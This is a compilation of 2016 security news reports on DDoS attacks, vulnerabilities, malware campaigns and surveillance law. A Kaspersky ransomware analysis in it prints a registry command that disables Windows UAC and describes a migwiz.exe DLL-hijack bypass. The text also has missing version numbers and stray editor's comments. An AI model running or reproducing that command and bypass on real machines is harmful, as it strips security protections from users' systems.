The company has no doubts about the malicious nature of the DDoS attack that reached a magnitude and a level of sophistication never experienced before by StarHub.

“These two recent attacks that we experienced were unprecedented in scale, nature and complexity. We would like to thank our customers for their patience as we took time to fully understand these unique situations and to mitigate them effectively”, reads StarHub.

In the message shared by the company there is no explicit reference to the Mirai botnet, but representatives of StarHub told Straits Times speculated the attack was powered by customers’ infected webcams and routers.

The company is inviting its customers to use only IoT from reputable vendors and it is inviting to adopt a proper security posture when dealing with connected objects. The company already started a campaign to sanitize the kit used by its customers.


Singapore’s Cyber Security Agency and the Infocomm Media Development Authority issued a notice to all Internet service providers and telco companies to improve the level of cyber security following two cyber attacks on StarHub.

“This is the first time that Singapore has experienced such an attack on its telco infrastructure,” reads the joint notice.

“Given the increasing connectedness of digital systems, there is no fool-proof solution. It takes a collective effort from companies and society to bolster our cyber resilience,” according to a joint statement late Wednesday.

CVE-2016-7855 flaw in Adobe Flash Player exploited in targeted attacks
27.10.2016 securityaffairs Vulnerebility

Adobe has issued a security patch for its Flash Player that fixes a critical vulnerability, tracked as CVE-2016-7855, used in targeted attacks.
Adobe has released a security update for its Flash Player that address a critical vulnerability, tracked as CVE-2016-7855, that has been exploiting in the wild by threat actors.

According to the security advisory issued by Adobe, the CVE-2016-7855 has been exploiting in targeted attacks. The vulnerability is a use-after-free issue that can be triggered by attackers for arbitrary code execution.

“Adobe has released security updates for Adobe Flash Player for Windows, Macintosh, Linux and Chrome OS. These updates address a critical vulnerability that could potentially allow an attacker to take control of the affected system.” states the summary published by Adobe.

“Adobe is aware of a report that an exploit for CVE-2016-7855 exists in the wild, and is being used in limited, targeted attacks against users running Windows versions 7, 8.1 and 10.”

The CVE-2016-7855 flaw affects Windows, Macintosh, Linux and Chrome OS, Flash Player and earlier, and and earlier for Linux.

The vulnerability was discovered by the researchers Neel Mehta and Billy Leonard from the Google Threat Analysis Group.

Adobe  CVE-2016-7855  targeted attacks.

The researchers confirmed the exploitation of the CVE-2016-7855 vulnerability in a few, targeted attacks against users running Windows 7, 8.1 and 10.

The security researchers at Adobe speculate the involvement of a sophisticated threat actor behind the targeted attacks that exploited the issue.

Adobe issued the Flash Player and (Linux).

Both Microsoft and Google are also expected to address the vulnerability by issuing updates for Chrome, Edge, and Internet Explorer 11.

Adobe software continues to be a privileged target of hackers, zero-day and security vulnerabilities affecting the products of the company have been exploited in numerous attacks in the wild.

CloudFanta Malware Steals Banking Information Via Cloud Storage Apps
27.10.2016 securityaffairs Virus

Watch out, threat research labs Netskope spotted the CloudFanta Malware Stealing Banking Information Via Cloud Storage Apps.
Threat Research Labs, Netskope, published a detailed research on the malware “CloudFanta” campaign, suspect since July 2016 to steal more than 26,000 worth of email credentials. CloudFanta benefits from the ‘SugarSync’ – a cloud storage app – to distribute itself and steal user credentials and monitor online banking activities to extract sensitive information.

CloudFanta attacks its victims through an attachment link in a spearfishing email. It lures the victim to click on the provided link or execute a file. According to the experts at Netskope, the SugarSync spread the malware with a URL “https://www[.]sugarsync[.]com/pf/D3202366_07280196_66523?directDownload=true.”

The downloaded zip archive “NF-9944132-br.zip” contained a downloader JAR file “NF-9944132-br.PDF.jar” with the dual extension “.PDF.jar.” The files retrieved by this downloader JAR are detected by Netskope Threat Protection as “Backdoor.Generckd.3549404,




and Gen:Variant.Symm.60013.”

Above research explained by Netskope, suggests that users are primarily targeted by a link in a spearphishing email, which lures and leads them to download a zip file which contains a dual extension “.PDF.JAR” to fool the victim. When he opens the JAR file, it silently downloads DLL (Dynamic Linked Library) files in the background (C:\users\public).


The CloudFanta malware goes undetected by network security devices such as firewalls, and intrusion detection systems because it downloads DLL files under the hoax extension “.PNG” and uses SSL/HTTPS communication. These DLL files are then renamed with the hostname and extension “.TWERK”

The director of engineering and cloud security research of Netskope, Ravi Balupari explains that “This malware campaign looks for the users’ email addresses and passwords,” he says, “It’s also targeting specific users.” As the primary target of CloudFanta is currently Brazil.

How does this malware work? When victims enter their login credentials on an infected machine, their sign-in page redirects to a phishing sign-in page so that their credentials can be stolen. When they enter their credentials the data is uploaded to the C&C server, and then they are redirected back to the original sign-in page. Balupari explains, the malware also bypasses security measures of virtual keyboards, as most banks use sign-in through virtual keyboards.

When victims try to access their accounts, the malware takes a snapshot of every single click. It then saves a text file containing mouse clicks, which helps attackers to view victim’s passwords later.

SugarSync isn’t the only software application affected by CloudFanta; the malware also abused DropBox to host malicious files. The ability to automatically download files and SugarSync’s broad user base made it easier for the malware to spread itself.

Traditional malware used other servers to host attacker’s files, on the other hand with the cloud, it is convenient for them to have broader access and spread cloud-based malware quickly and access everywhere.

Balupari explains, “Typically, cloud-based apps provide a convenient method for downloading files.”

Netskope has joined hands with Sugarsync to stop the malware from spreading by taking down infected URLs. The collaboration is to provide information on malicious links and monitor CloudFanta changes in other malware campaigns.

Balupari said, “We’ll definitely see a rise in cloud malware campaigns going forward,” he further said, “Enterprises and customers who have been adopting cloud apps need to add additional layers of security.”

There are various steps businesses and individuals can take to prevent cloud-malware from infecting their sensitive information, for example, policy to block executable files with type “image/png,” end-to-end encryption software, enable “view known file extension” in windows explorer, two-factor authentication, Virtual Private Network (VPN) software, updated antivirus, and keep system updated.

IT pros should also make a practice to keep tracks and detect unauthorized cloud services and ensure policies regarding prevention of data loss, managing data entry, and back-up of sensitive data stored in the cloud.

Experts disclosed a critical flaw in Schneider Industrial Firewalls
27.10.2016 securityaffairs Vulnerebility

CyberX experts at the SecurityWeek’s 2016 ICS Cyber Security Conference disclosed a critical flaw in the Schneider Industrial Firewalls.
This week, at the SecurityWeek’s 2016 ICS Cyber Security Conference, researchers at industrial security firm CyberX disclosed several important vulnerabilities.

The experts demonstrated how hackers can target ICS systems and passing security measures in places.

Among the vulnerabilities disclosed by the experts, there is a flaw affecting a Schneider Electric industrial firewall that could be exploited by hackers for remote code execution.

The vulnerability affects products of the Schneider Electric’s ConneXium TCSEFEC family of industrial ethernet firewalls. This family of products is used in the industrial contexts for the protection of SCADA systems, automation systems, industrial networks and other systems.

The experts discovered that the web-based administration interface of the Schneider Electric’s ConneXium TCSEFEC firewalls is affected by a buffer overflow. The exploitation of the flaw could allow attackers to execute arbitrary code.


The researchers also reported the flaw to the US ICS-CERT that is to issue a security advisory.

A threat actor could exploit the flaw to change firewall rules, eavesdrop on traffic, inject malicious traffic, and disrupt communications.

The researchers highlighted that the flaw is exploitable also by attackers that haven’t specific technical skills.

“Exploitation of this security hole could also lead to manipulation of control systems, which, in a worst case scenario, could result in physical damage. Programmable logic controllers (PLCs) typically don’t have any type of authentication, allowing attackers to easily gain access and exploit known or zero-day flaws.” reported Eduard Kovacs from Security Week.

Unfortunately, it is quite easy for attackers to target Schneider industrial firewalls that are easy to find thanks to search engines such as Shodan or Censys.

According to CyberX, the vendor Schneider Electric has already developed a security update to address the vulnerability, but it has yet released it.

The researchers from CyberX also reported seven zero-day flaws in PLC systems from a major unnamed vendor that is already working on a security update to fix them.

The “notification” ransomware lands in Brazil
26.10.2016 Kaspersky Virus
It’s unusual for a day to go by without finding some new variant of a known ransomware, or, what is even more interesting, a completely new one. Unlike the previously reported and now decrypted Xpan ransomware, this same-but-different threat from Brazil has recently been spotted in the wild. This time the infection vector is not a targeted remote desktop intrusion, but a more massively propagated malicious campaign relying on traditional spam email.

Since the infection is not done manually by the bad guys, their malware has a higher chance of being detected and we believe that is one of the reasons for them to have added one more level of protection to the code, resorting to a binary dropper to launch the malicious payload.

Given that this particular ransomware is fairly well known by now, instead of opting for the usual branding and marketing efforts in which most ransomware authors invest time, this group has decided to choose an unnamed campaign, showing only an email address for technical support and a bitcoin address for making the payment. It has become a kind of urban legend that if you can’t find something on Google, then it doesn’t exist.

Not very long ago, we saw the birth of truly autochthonous Brazilian ransomware, without much technical sophistication and mainly based on an open-source project. While there’s a long road ahead for local bad guys to achieve the level of the key players on the ransomware scene, this particular family is interesting to study since there have been versions in English, Italian, and now Brazilian Portuguese. Is this ransomware being sold as a commodity in underground forums with Brazilian crews just standing on the shoulders of giants? Or is this a regional operation just starting out?

The "notification" ransomware lands in Brazil

As one of the very few ransomware variants that prepend a custom ‘Lock.’ extension to the encrypted files instead of appending it, the task of recognizing this malware is not particularly difficult. However, understanding its true origins could still be considered an ongoing debate.

The drop

If we trust that the first transaction corresponds to the very first victim, the campaign has probably been active since 2016-04-04 17:29:26 (April 4th, 2016). In reality, this is not exactly accurate. The timestamp of the original dropper shows that the sample was actually compiled at the beginning of October:

The "notification" ransomware lands in Brazil

That would mean that the criminal behind the campaign might have had different ransomware campaigns running in the past, or is just using the same BTC wallet for more than his criminal deeds.

The dropper is protected by the popular .NET obfuscator SmartAssembly, as can be seen by the string “Powered by SmartAssembly”. Once executed, it tries to mask itself in the Alternate Data Stream of the NTFS file system in Windows:

“%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Sims.exe:Zone.Identifier
It’s capable of disabling Windows LUA protection:

(cmd.exe /c %WINDIR%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f)

The mechanism used to write new information to the registry is quite unusual: it uses the official windows application ‘migwiz.exe’ in order to bypass the UAC screen, not requiring any action from the user to execute with elevated privileges.

The malware is able to do that by writing a library ‘cryptbase.dll’ to the same folder as the ‘migwiz.exe’ file. Then, as soon as it’s launched, the process will load this library, which has a WinExec call that will launch the command line provided by the parameter.

The "notification" ransomware lands in Brazil

The reason why they are using MigWiz is because this process is one that is in Microsoft’s auto-elevate list, meaning it can be elevated without asking for explicit permission.

The "notification" ransomware lands in Brazil

As a simple mean of information gathering, the dropper will read the name of the infected computer:

Moreover, it includes data stealer techniques, such as retrieving information from the clipboard, or while it’s being typed on the keyboard. Additionally it has the capability to reboot the user’s machine.

@4333be: push ebp
@4333bf: mov ebp, esp
@4333c1: sub esp, 14h
@4333c4: push ebx
@4333c5: mov ebx, dword ptr [ebp+08h]@4333c8: lea eax, dword ptr [ebp-04h]@4333cb: push eax
@4333cc: push 00000028h
@4333ce: call dword ptr [00482310h] ;GetCurrentProcess@KERNEL32.DLL
@4333d4: push eax
@4333d5: call dword ptr [0048202Ch] ;OpenProcessToken@ADVAPI32.DLL
@4333db: test eax, eax
@4333dd: je 0043341Eh
@4333df: lea ecx, dword ptr [ebp-10h]@4333e2: push ecx
@4333e3: push 00487D68h ;SeShutdownPrivilege

Finally, it drops and executes the file tmp.exe (corresponding hash B4FDC93E0C089F6B885FFC13024E4B9).

Hello sir, hello madam, your fines have been locked

After the infection has been completed, as is usual in all ransomware families, the ransom note is shown. This time, it is written in Brazilian Portuguese and demanding 2000 BRL, which equates to around 627 USD or 1 BTC at the time of writing.

The bitcoin address provided (1LaHiL3vTGdbXnzyQ9omsYt8nFkUafXzK4) for payment shows total deposits for 1.89 BTC although many transactions have been made since the creation of this wallet. This is leading us to believe that either the criminal has been using the wallet for other purposes or they have bargaining with the victims and offering them a lower price, as depicted by the amount in each transaction.

The "notification" ransomware lands in Brazil

The ransom note is very succinct, without giving any special payment URL or any other type of information. The victim will have to learn about bitcoin payments the hard way, and should they need support they can reach the criminals through a single email point of contact.

Ola Sr(a),
TODOS os seus arquivos foram BLOQUEADOS e esse bloqueio somente serão DESBLOQUEADOS
caso pague um valor em R$ 2000,00 (dois Mil reais) em Bitcoins
Após o pagamento desse valor, basta me enviar um print para o email
que estarei lhe enviando o programa com a senha para descriptografar/desbloquear o seus arquivos.
Caso o pagamento não seja efetuado, todos os seus dados serão bloqueados
permanentemente e o seu computador sera totalmente formatado
(Perdendo assim, todas as informações contidas nele, incluindo senhas de email, bancárias…)
O pagamento deverá ser efetuado nesse endereço de Bitcoin:
Para converter seu saldo em bitcoins acesse o site:

Growth of ransomware in Brazil

The growth of ransomware in Brazil has been nothing short of impressive, taking into consideration that during October 2016 alone the popular ransomware family Packed.NSIS.MyxaH.gen family grew by 287.96%, and another of the usual suspects Trojan-Ransom.Win32.CryptXXX.gen grew by 56.96%, (when compared to the previous month in each case.)

The "notification" ransomware lands in Brazil

In 2016, the 3 most important families of ransomware have been Trojan-Ransom.Win32.Blocker, accounting for 49.63% of the total infections,

Trojan-Ransom.NSIS.Onion, 29.09%, and Trojan-Ransom.Win32.Locky, 3.99%.

Currently, Brazil is the eighth most affected country worldwide as far as ransomware infections go for this year, and ranked first in Latin America.

Indicators of compromise

File: 04.exe
Size: 1049600
Compiled: Saturday, October 8 2016, 11:22:30 – 32 Bit .NET

File: tmp.exe
Size: 842220
MD5: BB4FDC93E0C089F6B885FFC13024E4B9
Compiled: Sunday, January 29 2012, 21:32:28 – 32 Bit

Hacking Firmware from Mobile Phone Hacking Company Leaked Online
26.10.2016 thehackernews Mobil
The Israeli firm Cellebrite, which provides digital forensics tools and software to help law enforcement access mobile phones in investigations, has had its firmware and software leaked online.
Yes, you heard that right. Cellebrite's most sensitive in-house capabilities have been made public by one of its products' resellers, who is now distributing copies of Cellebrite's firmware and software for anyone to download.
The apparent reseller is McSira Professional Solutions, which hosts software for various versions of Cellebrite's Universal Forensic Extraction Device (UFED).
UFED is one of the company's key products that help investigators bypass the security mechanisms of mobile phones, especially iPhones, and extract all data and passwords from them.
For the Cellebrite's hand on iOS devices, you can watch the 2015 YouTube video (below), which demonstrates one of the company's products that unlocked the iPhone device in few hours.
Download Links to Cellebrite's Key Forensic Product
McSira is allowing anyone to download the firmware for the UFED Touch and UFED 4PC (PC version). The company is also hosting copies of UFED packages for different mobile phone brands, including Apple, Samsung, Blackberry, Nokia, and LG.
Besides this, McSira is also hosting copies of Cellebrite forensic software, such as the UFED Phone Detective, UFED Cloud Analyzer and Link Analyzer, which allows investigators to analyze seized data further.
McSira is likely offering these download links for firmware and software files so that its customers – which, according to its site, are "police, military and security agencies in the E.U. and other parts of the world" – can conveniently update their hardware to the latest version.

However, the company opened doors for researchers, hackers, and its competitors to download these leaked files, reverse-engineer them, and figure out how Cellebrite's tools break into mobile phones.
Researcher Started Examining leaked Software and Firmware
According to Joseph Cox, freelance security journalist for Motherboard, an unnamed researcher has already started examining the leaked files to disclose the kind of exploits Cellebrite uses to bypass even strong security mechanisms on mobile phones, as well as weaknesses in the implementation of affected phones that could be fixed.
Another researcher Pedro Vilaça from SentinelOne said he already cracked some of the Cellebrite software and ran it against an old iPad, though he said he needed to explore the leaked files more to understand the capability of those software better.
"Doesn't seem to be trying to exploit things but just data extraction," Vilaça told Motherboard. "For example, I'd to pair my device with iTunes for the logical extraction feature to work."
Mike Reilly, a PR firm representative that works with Cellebrite, said the McSira website's links "don't allow access to any of the solutions without a license key," meaning that downloaders need a key (code) given by Cellebrite or its reseller to run those software.
At the time of writing, McSira is hosting these files, but it is not clear how long the files will be hosted on its website.
McSira and Cellebrite have yet to comment on the matter

Domain Hijacking – An Invisible and Destructive Threat We Should Watch For
26.10.2016 securityaffairs Hacking

The Morphus Labs warns about another major threat, the domain hijacking incident, a threat that can completely subvert your information security strategy.
The Morphus Labs warns this week about another major threat. Renato Marinho and Victor Pasknel treated a domain hijacking incident, a threat that can completely subvert your information security strategy. They give details in this article how the incident was handled and how we can prevent similar scenarios.

It’s Saturday morning and you, the CSO of a huge company, start to receive messages from various sources, including press, informing that all of your organization Internet addresses are getting visitors to fake websites offering malicious content in form of fake security modules and/or updates.

What appeared to be a website defacement attack, turned out to be something much worse. In examining more closely, you realize that cybercriminals did, in fact, the kidnapping of the entire organization domain and directed all addresses to fake websites aiming to steal information from your customers and spreading malicious code. The worst thing is that there was no action that depended exclusively on you to solve the problem immediately.

In this article, we describe the incident response to the scenario described above and how this threat, being capable to subvert your entire strategy and security investment, can be mitigated with very simple actions.

Domain Name System (DNS) basics
To better understanding what happened, it’s important to understand some basic DNS concepts. If you are familiar with this subject, just jump to section 3.

DNS stands for Domain Name System and works as a foundation for the Internet . All addresses names we use daily to reach Websites and other Internet services have to be translated to IP (Internet Protocol); the translation or resolution process between an internet address name and IP address is the main role of DNS Servers.

DNS Servers work as a hierarchy of sorts, where the resolution requests are passed through it to the right server that is in charge of resolving the names for a certain domain, is reached. The root of this hierarchy, that is the invisible domain dot (“.”) in the end of any Internet address, is controlled by a group of DNS Servers distributed in different places around the world. Those root DNS Servers have to know the IP address of the DNS Servers that are in charge of all Top Level Domains (TLD), like the “.com”. The “.com” DNS servers in turn, have to know the IP address of the DNS Servers that are in charge of your company’s domain name, like “yourdomain.com” and so on.

For example, when someone asks for “www.yourdomain.com.”, the request reaches the root servers (“.”) that in turn, reaches the “.com” servers, that in turn, reach your company’s DNS servers, that finally resolves the address “www” and return the correct IP address.

The TLDs are controlled and managed by registry operators, also called Network Information Center (NIC). The registry operators manage the registration of domain names within the domains for which they are responsible. So, the “.com” registry operator is the organization that will hold the configuration of the DNS Servers IP addresses that are in charge of resolving the IP address of a domain like “yourcompany.com”.

Domain Hijacking

Domain Hijacking
For you to register or manage a domain in any registry operator, you have to previously create an account (basically, username and password) on their web portal. This account will be used to manage the IP addresses of the DNS Servers that will point to the IP addresses of your website or e-mail servers.

Note that the access credentials to the portal operator are extremely sensitive information. Someone malicious in possession of such information would be able to change any configuration of your domains, including IP addresses of the DNS servers. In short, could hijack the Internet Domain of your company and target websites and emails to any address he wanted.

In the incident we treated at Morphus Labs, that’s exactly what happened. The bad actors stole the registry operator’s credentials and changed the primary and secondary DNS servers configuration pointing them to the criminals’ ones. After that, all the company’s customers were directed to a fake company website to download malicious content they were suggested by the fake content. We can imagine what the criminals’ strategy was had they had success spreading their malware.

Needless to say, the crooks changed the password after gaining access to the portal. In other words, they hijacked the domain and made the recovery dependable of the registry operator. “Manual” account recover is usually not easy nor fast.

The Incident Response
Unlike the majority of cyber incidents, you have almost nothing to do in your infrastructure itself to revert the situation, like recovering backup or configurations. Like what happened in this incident, all servers were intact.

Read the full article: https://www.linkedin.com/pulse/domain-hijacking-invisible-destructive-threat-we-should-marinho

And works as the foundation of the internet “ou” and works as a foundation for the internet.

Please, revise if the meaning was kept.

Bad actors? Is this expression clear to the reader?

Two Critical Vulnerabilities Patched in Joomla 3.6.4. Update it asap!
26.10.2016 securityaffairs Vulnerebility

Joomla has released the new version Joomla 3.6.4 that fixes two critical account creation vulnerabilities affecting the popular CMS.
Recently we discussed cyber attacks in the wild leveraging on compromised websites running Joomla CMS. For example, in February, security experts observed a spike in the number of compromised Joomla-base websites used in Admedia attacks.

This week a new release of the Joomla CMS was released, Joomla 3.6.4 version, and fixes two critical account creation vulnerabilities.

Both vulnerabilities have been rated high severity, the developers at the team fixed both in a few days.

Joomla 3.6.4.

The first flaw, tracked as CVE-2016-8870, could be exploited by an attacker to register on a website even when the registration has been disabled. The vulnerability affects the Joomla core in versions 3.4.4 through 3.6.3.

“Inadequate checks allows for users to register on a site when registration has been disabled.” states the description of the flaw published by Joomla.

The second flaw, tracked as CVE-2016-8869, can be exploited by users to register on a website, but with elevated privileges.

“Incorrect use of unfiltered data allows for users to register on a site with elevated privileges.” states the description of the flaw published by Joomla.

The flaw was reported by Davide Tampellini on October 21, is caused by incorrect use of unfiltered data. Joomla versions affected ranges from 3.4.4 through 3.6.3.

The Joomla! Security Strike Team (JSST) urges administrators of websites running the popular CMS to update and patch their installations as soon as possible.

Now that the flaws have been publicly disclosed, crooks will try to exploit them in order to compromise websites and use them for illegal activities, for this reason, it is essential to urgently apply the updates.

WhatsApp Video Calling is Now Available for Android – Download Beta Version Now!
25.10.2016 thehackernews Android
WhatsApp is, no doubt, the largest end-to-end encrypted messaging network that allows over billion of its users to send messages, photos, videos, voice messages, documents, and calls that are secure from falling into the wrong hands.
And now it seems like WhatsApp is rolling out a much-awaited feature for the new beta versions of its Android app: Video Calling.
New beta version 2.16.318 of WhatsApp brings the ability for users to conduct video calls.
In order to activate video calls, you simply need to pull up a contact in the WhatsApp app, tap on the call icon and choose "Video Call." You can also go direct to the Calls tab to begin with the option.
The Video calls will only work if both the caller as well as the receiver have the same beta build of WhatsApp that supports the feature. If not, you will be notified with an error message that your contacts needs to update their app.
Download the latest build for WhatsApp Android from APKMirror now and give it a try.
For now, the Video calling feature is limited to WhatsApp's recent beta builds, reported Android Police, which first spotted the feature. So, you either need to download the APK link mentioned above or sign up to become a beta tester and update to WhatsApp (Beta) straight from the Google Play Store.
However, even if the feature doesn't work, there is a possible trick that you can try in order to activate the WhatsApp Video Calling feature.
Possible Trick to Activate WhatsApp Video Calling Feature
You simply need to follow these steps:
Backup all your chats,
Wipe WhatsApp data,
Log in again on WhatsApp.
You can try the above trick that had helped some users activate the video calling feature, but make sure you successfully backup your chats first.
Reportedly, WhatsApp Video Calling feature also provides an option to mute the call. You can even switch between the front and rear camera on your phone, just like any other video calling apps. Your app's call history list now displays both video and voice calls.
With its release in a stable version for over 1 Billion users in the coming weeks, the WhatsApp Video Calling feature could effectively ruin the market for Google's video calling app Duo, which has been released just few month ago.

Chinese Electronics Firm to Recall its Smart Cameras recently used to Take Down Internet
25.10.2016 thehackernews Security
You might be surprised to know that your security cameras, Internet-connected toasters and refrigerators may have inadvertently participated in the massive cyber attack that broke a large portion of the Internet on Friday.
That's due to massive Distributed Denial of Service (DDoS) attacks against Dyn, a major domain name system (DNS) provider that many sites and services use as their upstream DNS provider for turning IP addresses into human-readable websites.
The result we all know:
Twitter, GitHub, Amazon, Netflix, Pinterest, Etsy, Reddit, PayPal, and AirBnb, were among hundreds of sites and services that were rendered inaccessible to Millions of people worldwide for several hours.
Why and How the Deadliest DDoS Attack Happened
It was reported that the Mirai bots were used in the massive DDoS attacks against DynDNS, but they "were separate and distinct" bots from those used to execute record-breaking DDoS attack against French Internet service and hosting provider OVH.
Here's why: Initially the source code of the Mirai malware was limited to a few number of hackers who were aware of the underground hacking forum where it was released.
But later, the link to the Mirai source code suddenly received a huge promotion from thousands of media websites after it got exclusively publicized by journalist Brian Krebs on his personal blog.
Due to the worldwide news release and promotion, copycat hackers and unprofessional hackers are now creating their own botnet networks by hacking millions of smart devices to launch DDoS attacks, as well as to make money by selling their botnets as DDoS-for-hire service.
Mirai malware is designed to scan for Internet of Things (IoT) devices – mostly routers, security cameras, DVRs or WebIP cameras, Linux servers, and devices running Busybox – that are still using their default passwords. It enslaves vast numbers of these devices into a botnet, which is then used to launch DDoS attacks.
Chinese Firm Admits Its Hacked DVRs and Cameras Were Behind Largest DDoS Attack
More such attacks are expected to happen and will not stop until IoT manufacturers take the security of these Internet-connected devices seriously.
One such IoT electronic manufacturer is Chinese firm Hangzhou Xiongmai Technology which admitted its products – DVRs and internet-connected cameras – inadvertently played a role in the Friday's massive cyber attack against DynDNS.
The Mirai malware can easily be removed from infected devices by rebooting them, but the devices will end up infecting again in a matter of minutes if their owners and manufacturers do not take proper measures to protect them.
What's worse? Some of these devices, which include connected devices from Xiongmai, can not be protected because of hardcoded passwords, and the fact that their makers implemented them in a way that they cannot easily be updated.
"Mirai is a huge disaster for the Internet of Things," the company confirmed to IDG News. "[We] have to admit that our products also suffered from hacker's break-in and illegal use."
The company claimed to have rolled out patches for security vulnerabilities, involving weak default passwords, which allowed the Mirai malware to infect its products and use them to launch massive DDoS attack against DynDNS.
However, Xiongmai products that are running older versions of the firmware are still vulnerable. To tackle this issue, the company has advised its customers to update their product's firmware and change their default credentials.
The electronics components firm would also recall some of its earlier products, specifically webcam models, sold in the US and send customers a patch for products made before April last year, Xiongmai said in a statement on its official microblog.
Hackers are selling IoT-based Botnet capable of 1 Tbps DDoS Attack
Even worse is expected:
The Friday's DDoS attack that knocked down half of the Internet in the U.S. is just the beginning because hackers have started selling access to a huge army of hacked IoT devices designed to launch attacks that are capable of severely disrupting any web service.
The seller claimed their botnet could generate 1 Terabit of traffic that’s almost equal to the world's largest DDoS attack against OVH earlier this month, Forbes reported.
Anyone could buy 50,000 bots for $4,600, and 100,000 bots for $7,500, which can be combined to overwhelm targets with data.
Hacker groups have long sold access to botnets as a DDoS weapon for hire – like the infamous Lizard Squad's DDoS attack tool Lizard Stresser – but those botnets largely comprised of compromised vulnerable routers, and not IoT devices like connected cameras, toasters, fridges and kettles (which are now available in bulk).
In a separate disclosure, a hacking group calling itself New World Hackers has also claimed responsibility for the Friday's DDoS attacks, though it is not confirmed yet.
New World Hackers is the same group that briefly knocked the BBC offline last year. The group claimed to be a hacktivist collective with members in China, Russia, and India.
Well, who is behind the Friday's cyber attack is still unclear. The US Department of Homeland Security (DHS) and the FBI are investigating the DDoS attacks hit DynDNS, but none of the agencies yet speculated on who might be behind them.
The DynDNS DDoS attack has already shown the danger of IoT-based botnets, alarming both IoT manufacturers to start caring about implementing security on their products, and end users to start caring about the basic safety of their connected devices.

Warning! Your iPhone Can Get Hacked Just by Opening a JPEG Image, PDF or Font File
25.10.2016 thehackernews Apple
What's worse than knowing that innocent looking JPEGs, PDFs and font files can hijack your iPhone, iPad, and iPod.
Yes, attackers can take over your vulnerable Apple's iOS device remotely – all they have to do is trick you to view a maliciously-crafted JPEG graphic or PDF file through a website or an email, which could allow them to execute malicious code on your system.
That's a terrible flaw (CVE-2016-4673), but the good news is that Apple has released the latest version of its mobile operating system, iOS 10.1, for iPhones and iPads to address this remote-code execution flaw, alongside an array of bug fixes.
And now that the company has rolled out a security patch, some hackers would surely find vulnerable Apple devices to exploit the vulnerability and take full control of them.
So, users running older versions of iOS are advised to update their mobile devices to iOS 10.1 as soon as possible.
Besides this remote code execution flaw, the newest iOS 10.1 includes security updates to address 11 security flaws in the firmware for the iPhone, iPad, and iPod Touch.
Those flaws include local code execution vulnerabilities, a remote code execution bug in WebKit (CVE-2016-4677), a flaw in contacts (CVE-2016-4686) that would allow an application to pull Address Book details even when access has been revoked.
To update your iOS device go to Settings → General → Software Update.
Security Updates for Mac, Apple Watch, and AppleTV
Apple has also released security updates for Mac PCs, Apple Watches and Apple TVs.
So, Mac users are advised to update their system to macOS Sierra (10.12.1), which includes security fixes for 16 CVE-listed vulnerabilities.
Those weaknesses include an image-handling bug (CVE-2016-4673), a denial of service (DoS) error in Nvidia graphics card drivers, a bug that exposed the length of user passwords and Remote Code Execution (RCE) flaws that could be triggered by font files and PDF files, among others.
Meanwhile, Apple Watch users are recommended to update their devices to watchOS 3.1, which includes fixes for 8 security flaws.
Those flaws include 2 vulnerabilities in sandbox profiles that could allow third-party apps to view image libraries and sound files without permission.
AppleTV users are also advised to update their devices to tvOS 10.0.1, which includes patches for 10 vulnerabilities, including the WebKit remote code execution flaw, the sandbox profiles flaws, and the CoreGraphics JPEG flaw.
So get your Apple device patched before getting caught by hackers.

The German parliament passes controversial a surveillance law
25.10.2016 securityaffairs BigBrothers

The German Parliament passed a controversial surveillance law that seems to give more power to the BND intelligence agency.
The German Parliament last week approved a controversial espionage law that theoretically will tighten oversight of the BND intelligence agency, but that according to privacy advocates will give more power to the authorities.

The experts focused their critic on a controversial clause of the law that allows the BND to eavesdrop communications of foreign organizations and individuals on German soil and abroad that is in transit through a major internet exchange point in Frankfurt.

The Frankfurt-based operator DE-CIX in September filed a suit at a court in Leipzig against the government due to the new law that is considered illegal.

The German Government sustains that the measured approved by the surveillance law will allow it to investigate online crime and terrorism.

“How do we want to find terror suspects? How do we want to detect them if not through those means?” said Clemens Binninger a lawmaker with Chancellor Angela Merkel’s conservative party.

In the past, the BND was not authorized from spying its population, but the new controversial surveillance law will allow it under specific circumstances.

BND was only allowed to monitor up to 20 percent of traffic at one exchange point, but the new law gives full power and no limitation to the agency while spying on the Internet traffic.

“The law stipulates that through this activity it cannot be ruled out that the communications of German citizens and entities could also be accidentally intercepted, a major shift for the BND, which had been forbidden from spying on Germans.” reads a blog post published by the Reuters.

The Greens are expressing their disappointment to the law and have threatened to petition Germany’s highest court and the European Court of Justice to repeal the surveillance law.

This law is considered a serious threat to the privacy of the Germans, politicians and privacy defenders fear a dragnet surveillance.

Lawmaker Martina Renner of the hard-left Left party speculates the monitoring equipment used by the BND is not able to discern messages sent by foreigners from those of the Germans.

Surveillance activities conducted by the BND raised an intense debate on the internal political front. According to revelations published by the Der Spiegel, the agency supported the NSA in its global surveillance activities.

Der Eingangsbereich zur Zentrale des Bundesnachrichtendienstes (BND) in Pullach bei Muenchen, aufgenommen am Mittwoch (10.05.06). Entgegen urspruenglichen Planungen wird die Pullacher BND-Zentrale nun doch nicht geschlossen. Das technische Aufklaerungszentrum bleibt mit rund 1500 Mitarbeitern in Pullach, der Rest der insgesamt 6000 Mann starken Belegschaft zieht nach Berlin um. Foto: Johannes Simon/ ddp
Der Eingangsbereich zur Zentrale des Bundesnachrichtendienstes (BND) in Pullach bei Muenchen, aufgenommen am Mittwoch (10.05.06). Entgegen urspruenglichen Planungen wird die Pullacher BND-Zentrale nun doch nicht geschlossen. Das technische Aufklaerungszentrum bleibt mit rund 1500 Mitarbeitern in Pullach, der Rest der insgesamt 6000 Mann starken Belegschaft zieht nach Berlin um.
Foto: Johannes Simon/ ddp

The BND helped NSA in monitoring European politicians, the Intelligence Agency targeted private companies and entities worldwide in order to establish a dominance in the cyberspace. Among the victims, there was also the German Government and its politicians, including the chancellor Angela Merkel. The German Government was shocked at the time and expressly manifest his dissent to President Obama.

The BND supported espionage operations against various targets, including the European companies EADS (the manufacturer of Airbus planes) and Eurocopter, and European politicians, including German ones.

In August, the German weekly Die Zeit disclosed documents that reveal how the German Intelligence did a deal with the NSA to get the access to the surveillance platform XKeyscore.

Internal documents show that Germany’s domestic intelligence agency, the Federal Office for the Protection of the Constitution (BfV), received the software program XKeyscore from the NSA in return of data from Germany.

Back in 2o11, the NSA demonstrated the capabilities of the XKeyscore platform of the BfV agency. After two years of negotiation, the BfV signed an agreement to receive the NSA spyware software and install it for analyzing metadata collected on German citizens. In return, the German Agency promised to share metadata collected.

